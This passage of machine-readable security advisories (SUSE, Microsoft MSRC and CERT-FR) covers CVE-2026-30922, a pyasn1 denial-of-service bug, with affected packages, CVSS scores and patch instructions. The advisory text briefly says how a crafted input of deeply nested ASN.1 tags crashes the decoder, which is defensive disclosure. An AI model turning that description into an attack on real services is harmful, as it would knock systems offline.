"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:python313-pyasn1-0.6.1-160000.4.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:python313-pyasn1-0.6.1-160000.4.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T03:09:26Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:20878-1
Vulnerability from csaf_suse - Published: 2026-03-25 09:44 - Updated: 2026-03-25 09:44
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issue:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLE-Micro-6.1-461",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20878-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20878-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620878-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20878-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025053.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-25T09:44:19Z",
"generator": {
"date": "2026-03-25T09:44:19Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20878-1",
"initial_release_date": "2026-03-25T09:44:19Z",
"revision_history": [
{
"date": "2026-03-25T09:44:19Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch",
"product": {
"name": "python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch",
"product_id": "python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.1",
"product": {
"name": "SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sl-micro:6.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:44:19Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
MSRC_CVE-2026-30922
Vulnerability from csaf_microsoft - Published: 2026-03-02 00:00 - Updated: 2026-03-31 15:08
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2026-30922 pyasn1 Vulnerable to Denial of Service via Unbounded Recursion - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2026/msrc_cve-2026-30922.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "pyasn1 Vulnerable to Denial of Service via Unbounded Recursion",
"tracking": {
"current_release_date": "2026-03-31T15:08:36.000Z",
"generator": {
"date": "2026-04-01T07:38:22.487Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2026-30922",
"initial_release_date": "2026-03-02T00:00:00.000Z",
"revision_history": [
{
"date": "2026-03-21T01:02:51.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2026-03-27T14:39:08.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
},
{
"date": "2026-03-28T14:37:21.000Z",
"legacy_version": "3",
"number": "3",
"summary": "Information published."
},
{
"date": "2026-03-31T15:08:36.000Z",
"legacy_version": "4",
"number": "4",
"summary": "Information published."
}
],
"status": "final",
"version": "4"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
},
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cazl3 python-pyasn1 0.4.8-1",
"product": {
"name": "\u003cazl3 python-pyasn1 0.4.8-1",
"product_id": "3"
}
},
{
"category": "product_version",
"name": "azl3 python-pyasn1 0.4.8-1",
"product": {
"name": "azl3 python-pyasn1 0.4.8-1",
"product_id": "20840"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 python-pyasn1 0.4.8-1",
"product": {
"name": "\u003ccbl2 python-pyasn1 0.4.8-1",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "cbl2 python-pyasn1 0.4.8-1",
"product": {
"name": "cbl2 python-pyasn1 0.4.8-1",
"product_id": "20841"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 python-pyasn1 0.4.8-2",
"product": {
"name": "\u003cazl3 python-pyasn1 0.4.8-2",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 python-pyasn1 0.4.8-2",
"product": {
"name": "azl3 python-pyasn1 0.4.8-2",
"product_id": "21138"
}
}
],
"category": "product_name",
"name": "python-pyasn1"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 python-pyasn1 0.4.8-1 as a component of Azure Linux 3.0",
"product_id": "17084-3"
},
"product_reference": "3",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 python-pyasn1 0.4.8-1 as a component of Azure Linux 3.0",
"product_id": "20840-17084"
},
"product_reference": "20840",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 python-pyasn1 0.4.8-1 as a component of CBL Mariner 2.0",
"product_id": "17086-2"
},
"product_reference": "2",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 python-pyasn1 0.4.8-1 as a component of CBL Mariner 2.0",
"product_id": "20841-17086"
},
"product_reference": "20841",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 python-pyasn1 0.4.8-2 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 python-pyasn1 0.4.8-2 as a component of Azure Linux 3.0",
"product_id": "21138-17084"
},
"product_reference": "21138",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20840-17084",
"20841-17086",
"21138-17084"
],
"known_affected": [
"17084-3",
"17086-2",
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-30922 pyasn1 Vulnerable to Denial of Service via Unbounded Recursion - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2026/msrc_cve-2026-30922.json"
}
],
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-21T01:02:51.000Z",
"details": "0.4.8-2:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-3",
"17086-2",
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"environmentalsScore": 0.0,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"temporalScore": 7.5,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"17084-3",
"17086-2",
"17084-1"
]
}
],
"title": "pyasn1 Vulnerable to Denial of Service via Unbounded Recursion"
}
]
}
CERTFR-2026-AVI-0376
Vulnerability from certfr_avis - Published: 2026-03-30 - Updated: 2026-03-30
Multiple vulnerabilities have been discovered in Microsoft products. They allow an attacker to cause a security problem not specified by the vendor.
Solutions
Refer to the vendor's security bulletin to obtain the patches (see the Documentation section).
| Vendor | Product | Description |
|---|---|---|
| Microsoft | CBL Mariner | cbl2 telegraf 1.29.4-21 versions prior to 1.29.4-22 |
| Microsoft | Azure Linux | azl3 glibc 2.38-18 versions prior to 2.38-19 |
| Microsoft | Azure Linux | azl3 squid 6.13-3 versions prior to 6.13-4 |
| Microsoft | Azure Linux | azl3 python-pyasn1 0.4.8-1 versions prior to 0.4.8-2 |
| Microsoft | Azure Linux | azl3 nginx 1.28.2-1 versions prior to 1.28.3-1 |
| Microsoft | CBL Mariner | cbl2 ncurses 6.4-3 versions prior to 6.4-4 |
| Microsoft | Azure Linux | azl3 kernel 6.6.126.1-1 versions prior to 6.6.130.1-1 |
| Microsoft | Azure Linux | azl3 ncurses 6.4-2 versions prior to 6.4-3 |
| Microsoft | CBL Mariner | cbl2 terraform 1.3.2-29 versions prior to 1.3.2-30 |
| Microsoft | Azure Linux | azl3 libsoup 3.4.4-12 versions prior to 3.4.4-14 |
| Microsoft | Azure Linux | azl3 etcd 3.5.21-1 versions prior to 3.5.28-1 |
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "cbl2 telegraf 1.29.4-21 versions ant\u00e9rieures \u00e0 1.29.4-22",
"product": {
"name": "CBL Mariner",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 glibc 2.38-18 versions ant\u00e9rieures \u00e0 2.38-19",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 squid 6.13-3 versions ant\u00e9rieures \u00e0 6.13-4",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 python-pyasn1 0.4.8-1 versions ant\u00e9rieures \u00e0 0.4.8-2",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 nginx 1.28.2-1 versions ant\u00e9rieures \u00e0 1.28.3-1",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 ncurses 6.4-3 versions ant\u00e9rieures \u00e0 6.4-4",
"product": {
"name": "CBL Mariner",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 kernel 6.6.126.1-1 versions ant\u00e9rieures \u00e0 6.6.130.1-1",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 ncurses 6.4-2 versions ant\u00e9rieures \u00e0 6.4-3",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 terraform 1.3.2-29 versions ant\u00e9rieures \u00e0 1.3.2-30",
"product": {
"name": "CBL Mariner",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 libsoup 3.4.4-12 versions ant\u00e9rieures \u00e0 3.4.4-14",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 etcd 3.5.21-1 versions ant\u00e9rieures \u00e0 3.5.28-1",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-23318",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23318"
},
{
"name": "CVE-2026-23368",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23368"
},
{
"name": "CVE-2026-23281",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23281"
},
{
"name": "CVE-2026-32647",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32647"
},
{
"name": "CVE-2026-23269",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23269"
},
{
"name": "CVE-2026-23293",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23293"
},
{
"name": "CVE-2026-23290",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23290"
},
{
"name": "CVE-2026-27651",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27651"
},
{
"name": "CVE-2026-23303",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23303"
},
{
"name": "CVE-2026-27654",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27654"
},
{
"name": "CVE-2026-23340",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23340"
},
{
"name": "CVE-2026-23253",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23253"
},
{
"name": "CVE-2026-33343",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33343"
},
{
"name": "CVE-2026-23271",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23271"
},
{
"name": "CVE-2026-23268",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23268"
},
{
"name": "CVE-2026-23285",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23285"
},
{
"name": "CVE-2026-23304",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23304"
},
{
"name": "CVE-2026-23357",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23357"
},
{
"name": "CVE-2026-4645",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4645"
},
{
"name": "CVE-2026-23324",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23324"
},
{
"name": "CVE-2026-23347",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23347"
},
{
"name": "CVE-2026-28755",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28755"
},
{
"name": "CVE-2026-23317",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23317"
},
{
"name": "CVE-2026-23334",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23334"
},
{
"name": "CVE-2026-23391",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23391"
},
{
"name": "CVE-2026-23319",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23319"
},
{
"name": "CVE-2026-23279",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23279"
},
{
"name": "CVE-2026-23244",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23244"
},
{
"name": "CVE-2026-23246",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23246"
},
{
"name": "CVE-2026-30922",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30922"
},
{
"name": "CVE-2026-23286",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23286"
},
{
"name": "CVE-2026-23359",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23359"
},
{
"name": "CVE-2026-23298",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23298"
},
{
"name": "CVE-2026-23296",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23296"
},
{
"name": "CVE-2026-23396",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23396"
},
{
"name": "CVE-2026-23370",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23370"
},
{
"name": "CVE-2026-23315",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23315"
},
{
"name": "CVE-2026-23352",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23352"
},
{
"name": "CVE-2026-23367",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23367"
},
{
"name": "CVE-2026-32748",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32748"
},
{
"name": "CVE-2026-23300",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23300"
},
{
"name": "CVE-2026-23379",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23379"
},
{
"name": "CVE-2026-23381",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23381"
},
{
"name": "CVE-2026-23392",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23392"
},
{
"name": "CVE-2026-23245",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23245"
},
{
"name": "CVE-2026-4438",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4438"
},
{
"name": "CVE-2026-23364",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23364"
},
{
"name": "CVE-2026-23274",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23274"
},
{
"name": "CVE-2026-23284",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23284"
},
{
"name": "CVE-2026-23397",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23397"
},
{
"name": "CVE-2026-23343",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23343"
},
{
"name": "CVE-2026-23336",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23336"
},
{
"name": "CVE-2025-69720",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69720"
},
{
"name": "CVE-2026-23289",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23289"
},
{
"name": "CVE-2026-23292",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23292"
},
{
"name": "CVE-2026-23277",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23277"
},
{
"name": "CVE-2026-4437",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4437"
},
{
"name": "CVE-2026-27784",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27784"
},
{
"name": "CVE-2026-23388",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23388"
},
{
"name": "CVE-2026-28753",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28753"
},
{
"name": "CVE-2026-33526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33526"
},
{
"name": "CVE-2026-23310",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23310"
},
{
"name": "CVE-2026-2369",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2369"
},
{
"name": "CVE-2026-33515",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33515"
},
{
"name": "CVE-2026-23395",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23395"
},
{
"name": "CVE-2026-23100",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23100"
},
{
"name": "CVE-2026-23306",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23306"
},
{
"name": "CVE-2026-33413",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33413"
},
{
"name": "CVE-2026-23291",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23291"
},
{
"name": "CVE-2026-23382",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23382"
},
{
"name": "CVE-2026-23312",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23312"
},
{
"name": "CVE-2026-23365",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23365"
},
{
"name": "CVE-2026-23356",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23356"
},
{
"name": "CVE-2026-23307",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23307"
},
{
"name": "CVE-2026-23398",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23398"
},
{
"name": "CVE-2026-23351",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23351"
},
{
"name": "CVE-2026-23390",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23390"
}
],
"initial_release_date": "2026-03-30T00:00:00",
"last_revision_date": "2026-03-30T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0376",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-30T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Microsoft. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Microsoft",
"vendor_advisories": [
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-32748",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32748"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-4438",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-4438"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23347",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23347"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23268",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23268"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23392",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23392"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23319",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23319"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23253",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23253"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23296",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23296"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23364",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23364"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23368",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23368"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-27654",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27654"
},
{
"published_at": "2026-03-21",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-30922",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-30922"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23286",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23286"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23396",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23396"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23340",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23340"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23324",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23324"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33515",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33515"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23318",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23318"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23379",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23379"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23317",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23317"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-27784",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27784"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23359",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23359"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23245",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23245"
},
{
